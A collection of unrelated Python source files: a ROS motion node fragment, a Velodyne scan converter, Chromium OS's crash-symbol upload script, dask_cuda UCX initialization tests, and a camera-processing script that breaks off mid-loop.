rospy.init_node('motion_from_file', anonymous=False)
double_rock = 'double_rock::box'
shake_table = 'prismatic_large_box::box'
mff = MotionFromFile('RSN316.csv', shake_table)
try:
rospy.spin()
except rospy.ROSInterruptException:
print("Node killed!")
|
convert_velo_txt2bin.py
|
import argparse
import glob
import multiprocessing
import os
import sys
import time
import numpy as np
import tqdm
dname = os.path.dirname(__file__)
module_dir = os.path.abspath("{}/deeplio".format(dname))
content_dir = os.path.abspath("{}/..".format(dname))
sys.path.append(dname)
sys.path.append(module_dir)
sys.path.append(content_dir)
from deeplio.common import utils
def convert_txt_to_bin(velo_file):
velo_bin = velo_file.replace('.txt', '.npy')
frame = utils.load_velo_scan(velo_file)
np.save(velo_bin, frame)
def convert(args):
for p in args['path']:
print("Converting {}".format(p))
velo_files = np.array(glob.glob("{}/*.txt".format(p)))
num_files = len(velo_files)
processes = [] * num_files
for i in tqdm.tqdm(range(0, num_files)):
p = multiprocessing.Process(target=convert_txt_to_bin, args=([velo_files[i]]))
processes.append(p)
p.start()
# give the cpu some times to finish some of the converting processes
if i % 15 == 0:
time.sleep(0.5)
for process in processes:
process.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='DeepLIO Training')
# Device Option
parser.add_argument('-p', '--path', nargs="+", help='path or a list paths to velodyne text files', required=True)
args = vars(parser.parse_args())
convert(args)
print("done!")
|
upload_symbols.py
|
# Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Upload all debug symbols required for crash reporting purposes.
This script need only be used to upload release builds symbols or to debug
crashes on non-release builds (in which case try to only upload the symbols
for those executables involved).
"""
from __future__ import print_function
import ctypes
import datetime
import errno
import functools
import hashlib
import httplib
import multiprocessing
import os
import poster
try:
import Queue
except ImportError:
# Python-3 renamed to "queue". We still use Queue to avoid collisions
# with naming variables as "queue". Maybe we'll transition at some point.
# pylint: disable=F0401
import queue as Queue
import random
import signal
import socket
import textwrap
import tempfile
import time
import urllib2
import urlparse
from chromite.cbuildbot import constants
from chromite.lib import cache
from chromite.lib import commandline
from chromite.lib import cros_build_lib
from chromite.lib import gs
from chromite.lib import osutils
from chromite.lib import parallel
from chromite.lib import retry_util
from chromite.lib import signals
from chromite.lib import timeout_util
from chromite.scripts import cros_generate_breakpad_symbols
# Needs to be after chromite imports.
# TODO(build): When doing the initial buildbot bootstrap, we won't have any
# other repos available. So ignore isolateserver imports. But buildbot will
# re-exec itself once it has done a full repo sync and then the module will
# be available -- it isn't needed that early. http://crbug.com/341152
try:
import isolateserver
except ImportError:
isolateserver = None
# URLs used for uploading symbols.
OFFICIAL_UPLOAD_URL = 'http://clients2.google.com/cr/symbol'
STAGING_UPLOAD_URL = 'http://clients2.google.com/cr/staging_symbol'
# The crash server rejects files that are this big.
CRASH_SERVER_FILE_LIMIT = 350 * 1024 * 1024
# Give ourselves a little breathing room from what the server expects.
DEFAULT_FILE_LIMIT = CRASH_SERVER_FILE_LIMIT - (10 * 1024 * 1024)
# The batch limit when talking to the dedup server. We avoid sending one at a
# time as the round trip overhead will dominate. Conversely, we avoid sending
# all at once so we can start uploading symbols asap -- the symbol server is a
# bit slow and will take longer than anything else.
# TODO: A better algorithm would be adaptive. If we have more than one symbol
# in the upload queue waiting, we could send more symbols to the dedupe server
# at a time.
DEDUPE_LIMIT = 100
# How long to wait for the server to respond with the results. Note that the
# larger the limit above, the larger this will need to be. So we give it ~1
# second per item max.
DEDUPE_TIMEOUT = DEDUPE_LIMIT
# How long to wait for the notification to finish (in minutes). If it takes
# longer than this, we'll stop notifiying, but that's not a big deal as we
# will be able to recover in later runs.
DEDUPE_NOTIFY_TIMEOUT = 20
# The unique namespace in the dedupe server that only we use. Helps avoid
# collisions with all the hashed values and unrelated content.
OFFICIAL_DEDUPE_NAMESPACE = 'chromium-os-upload-symbols'
STAGING_DEDUPE_NAMESPACE = '%s-staging' % OFFICIAL_DEDUPE_NAMESPACE
# How long to wait (in seconds) for a single upload to complete. This has
# to allow for symbols that are up to CRASH_SERVER_FILE_LIMIT in size.
UPLOAD_TIMEOUT = 30 * 60
# Sleep for 200ms in between uploads to avoid DoS'ing symbol server.
DEFAULT_SLEEP_DELAY = 0.2
# Number of seconds to wait before retrying an upload. The delay will double
# for each subsequent retry of the same symbol file.
INITIAL_RETRY_DELAY = 1
# Allow up to 7 attempts to upload a symbol file (total delay may be
# 1+2+4+8+16+32=63 seconds).
MAX_RETRIES = 6
# Number of total errors, before uploads are no longer attempted.
# This is used to avoid lots of errors causing unreasonable delays.
# See the related, but independent, error values below.
MAX_TOTAL_ERRORS_FOR_RETRY = 30
# A watermark of transient errors which we allow recovery from. If we hit
# errors infrequently, overall we're probably doing fine. For example, if
# we have one failure every 100 passes, then we probably don't want to fail
# right away. But if we hit a string of failures in a row, we want to abort.
#
# The watermark starts at 0 (and can never go below that). When this error
# level is exceeded, we stop uploading. When a failure happens, we add the
# fail adjustment, and when an upload succeeds, we add the pass adjustment.
# We want to penalize failures more so that we ramp up when there is a string
# of them, but then slowly back off as things start working.
#
# A quick example:
# 0.0: Starting point.
# 0.0: Upload works, so add -0.5, and then clamp to 0.
# 1.0: Upload fails, so add 1.0.
# 2.0: Upload fails, so add 1.0.
# 1.5: Upload works, so add -0.5.
# 1.0: Upload works, so add -0.5.
ERROR_WATERMARK = 3.0
ERROR_ADJUST_FAIL = 1.0
ERROR_ADJUST_PASS = -0.5
def SymUpload(upload_url, sym_item):
"""Upload a symbol file to a HTTP server
The upload is a multipart/form-data POST with the following parameters:
code_file: the basename of the module, e.g. "app"
code_identifier: the module file's identifier
debug_file: the basename of the debugging file, e.g. "app"
debug_identifier: the debug file's identifier, usually consisting of
the guid and age embedded in the pdb, e.g.
"11111111BBBB3333DDDD555555555555F"
version: the file version of the module, e.g. "1.2.3.4"
product: HTTP-friendly product name
os: the operating system that the module was built for
cpu: the CPU that the module was built for
symbol_file: the contents of the breakpad-format symbol file
Args:
upload_url: The crash URL to POST the |sym_file| to
sym_item: A SymbolItem containing the path to the breakpad symbol to upload
"""
sym_header = sym_item.sym_header
sym_file = sym_item.sym_file
fields = (
('code_file', sym_header.name),
('debug_file', sym_header.name),
('debug_identifier', sym_header.id.replace('-', '')),
# The product/version fields are used by the server only for statistic
# purposes. They do not impact symbolization, so they're safe to set
# to any value all the time.
# In this case, we use it to help see the load our build system is
# placing on the server.
# Not sure what to set for the version. Maybe the git sha1 of this file.
# Note: the server restricts this to 30 chars.
#('version', None),
('product', 'ChromeOS'),
('os', sym_header.os),
('cpu', sym_header.cpu),
poster.encode.MultipartParam.from_file('symbol_file', sym_file),
)
data, headers = poster.encode.multipart_encode(fields)
request = urllib2.Request(upload_url, data, headers)
request.add_header('User-agent', 'chromite.upload_symbols')
urllib2.urlopen(request, timeout=UPLOAD_TIMEOUT)
def TestingSymUpload(upload_url, sym_item):
"""A stub version of SymUpload for --testing usage"""
cmd = ['sym_upload', sym_item.sym_file, upload_url]
# Randomly fail 80% of the time (the retry logic makes this 80%/3 per file).
returncode = random.randint(1, 100) <= 80
cros_build_lib.Debug('would run (and return %i): %s', returncode,
cros_build_lib.CmdToStr(cmd))
if returncode:
output = 'Failed to send the symbol file.'
else:
output = 'Successfully sent the symbol file.'
result = cros_build_lib.CommandResult(cmd=cmd, error=None, output=output,
returncode=returncode)
if returncode:
exceptions = (
socket.error('[socket.error] forced test fail'),
httplib.BadStatusLine('[BadStatusLine] forced test fail'),
urllib2.HTTPError(upload_url, 400, '[HTTPError] forced test fail',
{}, None),
urllib2.URLError('[URLError] forced test fail'),
)
raise random.choice(exceptions)
else:
return result
def ErrorLimitHit(num_errors, watermark_errors):
"""See if our error limit has been hit
Args:
num_errors: A multiprocessing.Value of the raw number of failures.
watermark_errors: A multiprocessing.Value of the current rate of failures.
Returns:
True if our error limits have been exceeded.
"""
return ((num_errors is not None and
num_errors.value > MAX_TOTAL_ERRORS_FOR_RETRY) or
(watermark_errors is not None and
watermark_errors.value > ERROR_WATERMARK))
def _UpdateCounter(counter, adj):
"""Update |counter| by |adj|
Handle atomic updates of |counter|. Also make sure it does not
fall below 0.
Args:
counter: A multiprocessing.Value to update
adj: The value to add to |counter|
"""
def _Update():
clamp = 0 if type(adj) is int else 0.0
counter.value = max(clamp, counter.value + adj)
if hasattr(counter, 'get_lock'):
with counter.get_lock():
_Update()
elif counter is not None:
_Update()
def UploadSymbol(upload_url, sym_item, file_limit=DEFAULT_FILE_LIMIT,
sleep=0, num_errors=None, watermark_errors=None,
failed_queue=None, passed_queue=None):
"""Upload |sym_item| to |upload_url|
Args:
upload_url: The crash server to upload things to
sym_item: A SymbolItem containing the path to the breakpad symbol to upload
file_limit: The max file size of a symbol file before we try to strip it
sleep: Number of seconds to sleep before running
num_errors: An object to update with the error count (needs a .value member)
watermark_errors: An object to track current error behavior (needs a .value)
failed_queue: When a symbol fails, add it to this queue
passed_queue: When a symbol passes, add it to this queue
Returns:
The number of errors that were encountered.
"""
sym_file = sym_item.sym_file
upload_item = sym_item
if num_errors is None:
num_errors = ctypes.c_int()
if ErrorLimitHit(num_errors, watermark_errors):
# Abandon ship! It's on fire! NOoooooooooooOOOoooooo.
if failed_queue:
failed_queue.put(sym_file)
return 0
if sleep:
# Keeps us from DoS-ing the symbol server.
time.sleep(sleep)
cros_build_lib.Debug('uploading %s' % sym_file)
# Ideally there'd be a tempfile.SpooledNamedTemporaryFile that we could use.
with tempfile.NamedTemporaryFile(prefix='upload_symbols',
bufsize=0) as temp_sym_file:
if file_limit:
# If the symbols size is too big, strip out the call frame info. The CFI
# is unnecessary for 32bit x86 targets where the frame pointer is used (as
# all of ours have) and it accounts for over half the size of the symbols
# uploaded.
file_size = os.path.getsize(sym_file)
if file_size > file_limit:
cros_build_lib.Warning('stripping CFI from %s due to size %s > %s',
sym_file, file_size, file_limit)
temp_sym_file.writelines([x for x in open(sym_file, 'rb').readlines()
if not x.startswith('STACK CFI')])
upload_item = FakeItem(sym_file=temp_sym_file.name,
sym_header=sym_item.sym_header)
# Hopefully the crash server will let it through. But it probably won't.
# Not sure what the best answer is in this case.
file_size = os.path.getsize(upload_item.sym_file)
if file_size > CRASH_SERVER_FILE_LIMIT:
cros_build_lib.PrintBuildbotStepWarnings()
cros_build_lib.Warning('upload file %s is awfully large, risking '
'rejection by the symbol server (%s > %s)',
sym_file, file_size, CRASH_SERVER_FILE_LIMIT)
# Upload the symbol file.
success = False
try:
cros_build_lib.TimedCommand(
retry_util.RetryException,
(urllib2.HTTPError, urllib2.URLError), MAX_RETRIES, SymUpload,
upload_url, upload_item, sleep=INITIAL_RETRY_DELAY,
timed_log_msg='upload of %10i bytes took %%s: %s' %
(file_size, os.path.basename(sym_file)))
success = True
if passed_queue:
passed_queue.put(sym_item)
except urllib2.HTTPError as e:
cros_build_lib.Warning('could not upload: %s: HTTP %s: %s',
os.path.basename(sym_file), e.code, e.reason)
except (urllib2.URLError, httplib.HTTPException, socket.error) as e:
cros_build_lib.Warning('could not upload: %s: %s',
os.path.basename(sym_file), e)
finally:
if success:
_UpdateCounter(watermark_errors, ERROR_ADJUST_PASS)
else:
_UpdateCounter(num_errors, 1)
_UpdateCounter(watermark_errors, ERROR_ADJUST_FAIL)
if failed_queue:
failed_queue.put(sym_file)
return num_errors.value
# A dummy class that allows for stubbing in tests and SymUpload.
FakeItem = cros_build_lib.Collection(
'FakeItem', sym_file=None, sym_header=None, content=lambda x: '')
# TODO(build): Delete this if check. http://crbug.com/341152
if isolateserver:
class SymbolItem(isolateserver.BufferItem):
"""Turn a sym_file into an isolateserver.Item"""
ALGO = hashlib.sha1
def __init__(self, sym_file):
sym_header = cros_generate_breakpad_symbols.ReadSymsHeader(sym_file)
super(SymbolItem, self).__init__(str(sym_header), self.ALGO)
self.sym_header = sym_header
self.sym_file = sym_file
def SymbolDeduplicatorNotify(dedupe_namespace, dedupe_queue):
"""Send a symbol file to the swarming service
Notify the swarming service of a successful upload. If the notification fails
for any reason, we ignore it. We don't care as it just means we'll upload it
again later on, and the symbol server will handle that graciously.
This func runs in a different process from the main one, so we cannot share
the storage object. Instead, we create our own. This func stays alive for
the life of the process, so we only create one here overall.
Args:
dedupe_namespace: The isolateserver namespace to dedupe uploaded symbols.
dedupe_queue: The queue to read SymbolItems from
"""
if dedupe_queue is None:
return
item = None
try:
with timeout_util.Timeout(DEDUPE_TIMEOUT):
storage = isolateserver.get_storage_api(constants.ISOLATESERVER,
dedupe_namespace)
for item in iter(dedupe_queue.get, None):
with timeout_util.Timeout(DEDUPE_TIMEOUT):
cros_build_lib.Debug('sending %s to dedupe server', item.sym_file)
storage.push(item, item.content(0))
cros_build_lib.Debug('sent %s', item.sym_file)
cros_build_lib.Info('dedupe notification finished; exiting')
except Exception:
sym_file = item.sym_file if (item and item.sym_file) else ''
cros_build_lib.Warning('posting %s to dedupe server failed',
os.path.basename(sym_file), exc_info=True)
# Keep draining the queue though so it doesn't fill up.
while dedupe_queue.get() is not None:
continue
def SymbolDeduplicator(storage, sym_paths):
"""Filter out symbol files that we've already uploaded
Using the swarming service, ask it to tell us which symbol files we've already
uploaded in previous runs and/or by other bots. If the query fails for any
reason, we'll just upload all symbols. This is fine as the symbol server will
do the right thing and this phase is purely an optimization.
This code runs in the main thread which is why we can re-use the existing
storage object. Saves us from having to recreate one all the time.
Args:
storage: An isolateserver.StorageApi object
sym_paths: List of symbol files to check against the dedupe server
Returns:
List of symbol files that have not been uploaded before
"""
if not sym_paths:
return sym_paths
items = [SymbolItem(x) for x in sym_paths]
if storage:
try:
with timeout_util.Timeout(DEDUPE_TIMEOUT):
items = storage.contains(items)
except Exception:
cros_build_lib.Warning('talking to dedupe server failed', exc_info=True)
return items
def IsTarball(path):
"""Guess if this is a tarball based on the filename."""
parts = path.split('.')
if len(parts) <= 1:
return False
if parts[-1] == 'tar':
return True
if parts[-2] == 'tar':
return parts[-1] in ('bz2', 'gz', 'xz')
return parts[-1] in ('tbz2', 'tbz', 'tgz', 'txz')
def SymbolFinder(tempdir, paths):
"""Locate symbol files in |paths|
Args:
tempdir: Path to use for temporary files (caller will clean up).
paths: A list of input paths to walk. Files are returned w/out any checks.
Dirs are searched for files that end in ".sym". Urls are fetched and then
processed. Tarballs are unpacked and walked.
Returns:
Yield every viable sym file.
"""
for p in paths:
# Pylint is confused about members of ParseResult.
o = urlparse.urlparse(p)
if o.scheme: # pylint: disable=E1101
# Support globs of filenames.
ctx = gs.GSContext()
for p in ctx.LS(p):
cros_build_lib.Info('processing files inside %s', p)
o = urlparse.urlparse(p)
cache_dir = commandline.GetCacheDir()
common_path = os.path.join(cache_dir, constants.COMMON_CACHE)
tar_cache = cache.TarballCache(common_path)
key = ('%s%s' % (o.netloc, o.path)).split('/') # pylint: disable=E1101
# The common cache will not be LRU, removing the need to hold a read
# lock on the cached gsutil.
ref = tar_cache.Lookup(key)
try:
ref.SetDefault(p)
except cros_build_lib.RunCommandError as e:
cros_build_lib.Warning('ignoring %s\n%s', p, e)
continue
for p in SymbolFinder(tempdir, [ref.path]):
yield p
elif os.path.isdir(p):
for root, _, files in os.walk(p):
for f in files:
if f.endswith('.sym'):
yield os.path.join(root, f)
elif IsTarball(p):
cros_build_lib.Info('processing files inside %s', p)
tardir = tempfile.mkdtemp(dir=tempdir)
cache.Untar(os.path.realpath(p), tardir)
for p in SymbolFinder(tardir, [tardir]):
yield p
else:
yield p
def WriteQueueToFile(listing, queue, relpath=None):
"""Write all the items in |queue| to the |listing|.
Note: The queue must have a sentinel None appended to the end.
Args:
listing: Where to write out the list of files.
queue: The queue of paths to drain.
relpath: If set, write out paths relative to this one.
"""
if not listing:
# Still drain the queue so we make sure the producer has finished
# before we return. Otherwise, the queue might get destroyed too
# quickly which will trigger a traceback in the producer.
while queue.get() is not None:
continue
return
with cros_build_lib.Open(listing, 'wb+') as f:
while True:
path = queue.get()
if path is None:
return
if relpath:
path = os.path.relpath(path, relpath)
f.write('%s\n' % path)
def UploadSymbols(board=None, official=False, breakpad_dir=None,
file_limit=DEFAULT_FILE_LIMIT, sleep=DEFAULT_SLEEP_DELAY,
upload_limit=None, sym_paths=None, failed_list=None,
root=None, retry=True, dedupe_namespace=None):
"""Upload all the generated symbols for |board| to the crash server
You can use in a few ways:
* pass |board| to locate all of its symbols
* pass |breakpad_dir| to upload all the symbols in there
* pass |sym_paths| to upload specific symbols (or dirs of symbols)
Args:
board: The board whose symbols we wish to upload
official: Use the official symbol server rather than the staging one
breakpad_dir: The full path to the breakpad directory where symbols live
file_limit: The max file size of a symbol file before we try to strip it
sleep: How long to sleep in between uploads
upload_limit: If set, only upload this many symbols (meant for testing)
sym_paths: Specific symbol files (or dirs of sym files) to upload,
otherwise search |breakpad_dir|
failed_list: Write the names of all sym files we did not upload; can be a
filename or file-like object.
root: The tree to prefix to |breakpad_dir| (if |breakpad_dir| is not set)
retry: Whether we should retry failures.
dedupe_namespace: The isolateserver namespace to dedupe uploaded symbols.
Returns:
The number of errors that were encountered.
"""
# TODO(build): Delete this assert.
assert isolateserver, 'Missing isolateserver import http://crbug.com/341152'
if official:
upload_url = OFFICIAL_UPLOAD_URL
else:
cros_build_lib.Warning('unofficial builds upload to the staging server')
upload_url = STAGING_UPLOAD_URL
if sym_paths:
cros_build_lib.Info('uploading specified symbols to %s', upload_url)
else:
if breakpad_dir is None:
breakpad_dir = os.path.join(
root,
cros_generate_breakpad_symbols.FindBreakpadDir(board).lstrip('/'))
cros_build_lib.Info('uploading all symbols to %s from %s', upload_url,
breakpad_dir)
sym_paths = [breakpad_dir]
# We use storage_query to ask the server about existing symbols. The
# storage_notify_proc process is used to post updates to the server. We
# cannot safely share the storage object between threads/processes, but
# we also want to minimize creating new ones as each object has to init
# new state (like server connections).
storage_query = None
if dedupe_namespace:
dedupe_limit = DEDUPE_LIMIT
dedupe_queue = multiprocessing.Queue()
try:
with timeout_util.Timeout(DEDUPE_TIMEOUT):
storage_query = isolateserver.get_storage_api(constants.ISOLATESERVER,
dedupe_namespace)
except Exception:
cros_build_lib.Warning('initializing dedupe server connection failed',
exc_info=True)
else:
dedupe_limit = 1
dedupe_queue = None
# Can't use parallel.BackgroundTaskRunner because that'll create multiple
# processes and we want only one the whole time (see comment above).
storage_notify_proc = multiprocessing.Process(
target=SymbolDeduplicatorNotify, args=(dedupe_namespace, dedupe_queue))
bg_errors = multiprocessing.Value('i')
watermark_errors = multiprocessing.Value('f')
failed_queue = multiprocessing.Queue()
uploader = functools.partial(
UploadSymbol, upload_url, file_limit=file_limit, sleep=sleep,
num_errors=bg_errors, watermark_errors=watermark_errors,
failed_queue=failed_queue, passed_queue=dedupe_queue)
start_time = datetime.datetime.now()
Counters = cros_build_lib.Collection(
'Counters', upload_limit=upload_limit, uploaded_count=0, deduped_count=0)
counters = Counters()
def _Upload(queue, counters, files):
if not files:
return
missing_count = 0
for item in SymbolDeduplicator(storage_query, files):
missing_count += 1
if counters.upload_limit == 0:
continue
queue.put((item,))
counters.uploaded_count += 1
if counters.upload_limit is not None:
counters.upload_limit -= 1
counters.deduped_count += (len(files) - missing_count)
try:
storage_notify_proc.start()
with osutils.TempDir(prefix='upload_symbols.') as tempdir:
# For the first run, we collect the symbols that failed. If the
# overall failure rate was low, we'll retry them on the second run.
for retry in (retry, False):
# We need to limit ourselves to one upload at a time to avoid the server
# kicking in DoS protection. See these bugs for more details:
# http://crbug.com/209442
# http://crbug.com/212496
with parallel.BackgroundTaskRunner(uploader, processes=1) as queue:
dedupe_list = []
for sym_file in SymbolFinder(tempdir, sym_paths):
dedupe_list.append(sym_file)
dedupe_len = len(dedupe_list)
if dedupe_len < dedupe_limit:
if (counters.upload_limit is None or
dedupe_len < counters.upload_limit):
continue
# We check the counter before _Upload so that we don't keep talking
# to the dedupe server. Otherwise, we end up sending one symbol at
# a time to it and that slows things down a lot.
if counters.upload_limit == 0:
break
_Upload(queue, counters, dedupe_list)
dedupe_list = []
_Upload(queue, counters, dedupe_list)
# See if we need to retry, and if we haven't failed too many times yet.
if not retry or ErrorLimitHit(bg_errors, watermark_errors):
break
sym_paths = []
failed_queue.put(None)
while True:
sym_path = failed_queue.get()
if sym_path is None:
break
sym_paths.append(sym_path)
if sym_paths:
cros_build_lib.Warning('retrying %i symbols', len(sym_paths))
if counters.upload_limit is not None:
counters.upload_limit += len(sym_paths)
# Decrement the error count in case we recover in the second pass.
assert bg_errors.value >= len(sym_paths), \
'more failed files than errors?'
bg_errors.value -= len(sym_paths)
else:
# No failed symbols, so just return now.
break
# If the user has requested it, save all the symbol files that we failed to
# upload to a listing file. This should help with recovery efforts later.
failed_queue.put(None)
WriteQueueToFile(failed_list, failed_queue, breakpad_dir)
finally:
cros_build_lib.Info('finished uploading; joining background process')
if dedupe_queue:
dedupe_queue.put(None)
# The notification might be slow going, so give it some time to finish.
# We have to poll here as the process monitor is watching for output and
# will kill us if we go silent for too long.
wait_minutes = DEDUPE_NOTIFY_TIMEOUT
while storage_notify_proc.is_alive() and wait_minutes > 0:
if dedupe_queue:
qsize = str(dedupe_queue.qsize())
else:
qsize = '[None]'
cros_build_lib.Info('waiting up to %i minutes for ~%s notifications',
wait_minutes, qsize)
storage_notify_proc.join(60)
wait_minutes -= 1
# The process is taking too long, so kill it and complain.
if storage_notify_proc.is_alive():
cros_build_lib.Warning('notification process took too long')
cros_build_lib.PrintBuildbotStepWarnings()
# Kill it gracefully first (traceback) before tacking it down harder.
pid = storage_notify_proc.pid
for sig in (signal.SIGINT, signal.SIGTERM, signal.SIGKILL):
cros_build_lib.Warning('sending %s to %i', signals.StrSignal(sig), pid)
# The process might have exited between the last check and the
# actual kill below, so ignore ESRCH errors.
try:
os.kill(pid, sig)
except OSError as e:
if e.errno == errno.ESRCH:
break
else:
raise
time.sleep(5)
if not storage_notify_proc.is_alive():
break
# Drain the queue so we don't hang when we finish.
try:
cros_build_lib.Warning('draining the notify queue manually')
with timeout_util.Timeout(60):
try:
while dedupe_queue.get_nowait():
pass
except Queue.Empty:
pass
except timeout_util.TimeoutError:
cros_build_lib.Warning('draining the notify queue failed; trashing it')
dedupe_queue.cancel_join_thread()
cros_build_lib.Info('uploaded %i symbols (%i were deduped) which took: %s',
counters.uploaded_count, counters.deduped_count,
datetime.datetime.now() - start_time)
return bg_errors.value
def main(argv):
# TODO(build): Delete this assert.
assert isolateserver, 'Missing isolateserver import http://crbug.com/341152'
parser = commandline.ArgumentParser(description=__doc__)
parser.add_argument('sym_paths', type='path_or_uri', nargs='*', default=None,
help='symbol file or directory or URL or tarball')
parser.add_argument('--board', default=None,
help='board to build packages for')
parser.add_argument('--breakpad_root', type='path', default=None,
help='root directory for breakpad symbols')
parser.add_argument('--official_build', action='store_true', default=False,
help='point to official symbol server')
parser.add_argument('--regenerate', action='store_true', default=False,
help='regenerate all symbols')
parser.add_argument('--upload-limit', type=int, default=None,
help='only upload # number of symbols')
parser.add_argument('--strip_cfi', type=int,
default=CRASH_SERVER_FILE_LIMIT - (10 * 1024 * 1024),
help='strip CFI data for files above this size')
parser.add_argument('--failed-list', type='path',
help='where to save a list of failed symbols')
parser.add_argument('--dedupe', action='store_true', default=False,
help='use the swarming service to avoid re-uploading')
parser.add_argument('--testing', action='store_true', default=False,
help='run in testing mode')
parser.add_argument('--yes', action='store_true', default=False,
help='answer yes to all prompts')
opts = parser.parse_args(argv)
opts.Freeze()
if opts.sym_paths:
if opts.regenerate:
cros_build_lib.Die('--regenerate may not be used with specific files')
else:
if opts.board is None:
cros_build_lib.Die('--board is required')
if opts.breakpad_root and opts.regenerate:
cros_build_lib.Die('--regenerate may not be used with --breakpad_root')
if opts.testing:
# TODO(build): Kill off --testing mode once unittests are up-to-snuff.
cros_build_lib.Info('running in testing mode')
# pylint: disable=W0601,W0603
global INITIAL_RETRY_DELAY, SymUpload, DEFAULT_SLEEP_DELAY
INITIAL_RETRY_DELAY = DEFAULT_SLEEP_DELAY = 0
SymUpload = TestingSymUpload
dedupe_namespace = None
if opts.dedupe:
if opts.official_build and not opts.testing:
dedupe_namespace = OFFICIAL_DEDUPE_NAMESPACE
else:
dedupe_namespace = STAGING_DEDUPE_NAMESPACE
if not opts.yes:
prolog = '\n'.join(textwrap.wrap(textwrap.dedent("""
Uploading symbols for an entire Chromium OS build is really only
necessary for release builds and in a few cases for developers
to debug problems. It will take considerable time to run. For
developer debugging purposes, consider instead passing specific
files to upload.
"""), 80)).strip()
if not cros_build_lib.BooleanPrompt(
prompt='Are you sure you want to upload all build symbols',
default=False, prolog=prolog):
cros_build_lib.Die('better safe than sorry')
ret = 0
if opts.regenerate:
ret += cros_generate_breakpad_symbols.GenerateBreakpadSymbols(
opts.board, breakpad_dir=opts.breakpad_root)
ret += UploadSymbols(opts.board, official=opts.official_build,
breakpad_dir=opts.breakpad_root,
file_limit=opts.strip_cfi, sleep=DEFAULT_SLEEP_DELAY,
upload_limit=opts.upload_limit, sym_paths=opts.sym_paths,
failed_list=opts.failed_list,
dedupe_namespace=dedupe_namespace)
if ret:
cros_build_lib.Error('encountered %i problem(s)', ret)
# Since exit(status) gets masked, clamp it to 1 so we don't inadvertently
# return 0 in case we are a multiple of the mask.
ret = 1
return ret
# We need this to run once per process. Do it at module import time as that
# will let us avoid doing it inline at function call time (see SymUpload) as
# that func might be called by the multiprocessing module which means we'll
# do the opener logic multiple times overall. Plus, if you're importing this
# module, it's a pretty good chance that you're going to need this.
poster.streaminghttp.register_openers()
|
test_initialize.py
|
import multiprocessing as mp
import numpy
import psutil
import pytest
from dask import array as da
from distributed import Client
from distributed.deploy.local import LocalCluster
from dask_cuda.initialize import initialize
from dask_cuda.utils import get_ucx_config
mp = mp.get_context("spawn")
ucp = pytest.importorskip("ucp")
# Notice, all of the following tests is executed in a new process such
# that UCX options of the different tests doesn't conflict.
# Furthermore, all tests do some computation to trigger initialization
# of UCX before retrieving the current config.
def _test_initialize_ucx_tcp():
kwargs = {"enable_tcp_over_ucx": True}
initialize(**kwargs)
with LocalCluster(
protocol="ucx",
dashboard_address=None,
n_workers=1,
threads_per_worker=1,
processes=True,
config={"ucx": get_ucx_config(**kwargs)},
) as cluster:
with Client(cluster) as client:
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "tcp" in conf["TLS"]
assert "sockcm" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
return True
assert client.run_on_scheduler(check_ucx_options) is True
assert all(client.run(check_ucx_options).values())
def test_initialize_ucx_tcp():
p = mp.Process(target=_test_initialize_ucx_tcp)
p.start()
p.join()
assert not p.exitcode
def _test_initialize_ucx_nvlink():
kwargs = {"enable_nvlink": True}
initialize(**kwargs)
with LocalCluster(
protocol="ucx",
dashboard_address=None,
n_workers=1,
threads_per_worker=1,
processes=True,
config={"ucx": get_ucx_config(**kwargs)},
) as cluster:
with Client(cluster) as client:
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "cuda_ipc" in conf["TLS"]
assert "tcp" in conf["TLS"]
assert "sockcm" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
return True
assert client.run_on_scheduler(check_ucx_options) is True
assert all(client.run(check_ucx_options).values())
def test_initialize_ucx_nvlink():
p = mp.Process(target=_test_initialize_ucx_nvlink)
p.start()
p.join()
assert not p.exitcode
def _test_initialize_ucx_infiniband():
kwargs = {"enable_infiniband": True, "net_devices": "ib0"}
initialize(**kwargs)
with LocalCluster(
protocol="ucx",
dashboard_address=None,
n_workers=1,
threads_per_worker=1,
processes=True,
config={"ucx": get_ucx_config(**kwargs)},
) as cluster:
with Client(cluster) as client:
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "rc" in conf["TLS"]
assert "tcp" in conf["TLS"]
assert "sockcm" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
assert conf["NET_DEVICES"] == "ib0"
return True
assert client.run_on_scheduler(check_ucx_options) is True
assert all(client.run(check_ucx_options).values())
@pytest.mark.skipif(
"ib0" not in psutil.net_if_addrs(), reason="Infiniband interface ib0 not found"
)
def test_initialize_ucx_infiniband():
p = mp.Process(target=_test_initialize_ucx_infiniband)
p.start()
p.join()
assert not p.exitcode
|
multithread.py
|
from ximea import xiapi
from imutils.video import FPS
import imutils
import cv2
import numpy as np
from queue import Queue
from threading import Thread
import time
RESIZE = 50000
def worker(input_q, output_q):
fps = FPS().start()
while True:
fps.update()
frame = input_q.get()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
###
output = imutils.resize(frame, width=RESIZE, height=RESIZE)
output_q.put(output)
fps.stop()
###### All functions ####
def Mathematics(frame,buffer,stack):
# if not GPU:
frame = np.complex128(frame)
f = np.fft.fft2(frame)
fshift = np.fft.fftshift(f)
magnitude_spectrum = 20*np.log(np.abs(fshift))
return
def compare_fft():
return
def correlation_coefficient():
return
def gauss_erf(p,x,y):
return y - p[0] * np.exp(-(x-p[1])**2 /(2.0 * p[2]**2))
def gauss_eval(x,p):
return p[0] * np.exp(-(x-p[1])**2 /(2.0 * p[2]**2))
def gaussianFit(X,Y):
return
if __name__ == '__main__':
qu_limit = 1000
threadn = cv2.getNumberOfCPUs() -2
print("Threads : ", threadn)
input_q = Queue(qu_limit) # fps is better if queue is higher but then more lags
output_q = Queue()
for i in range(threadn):
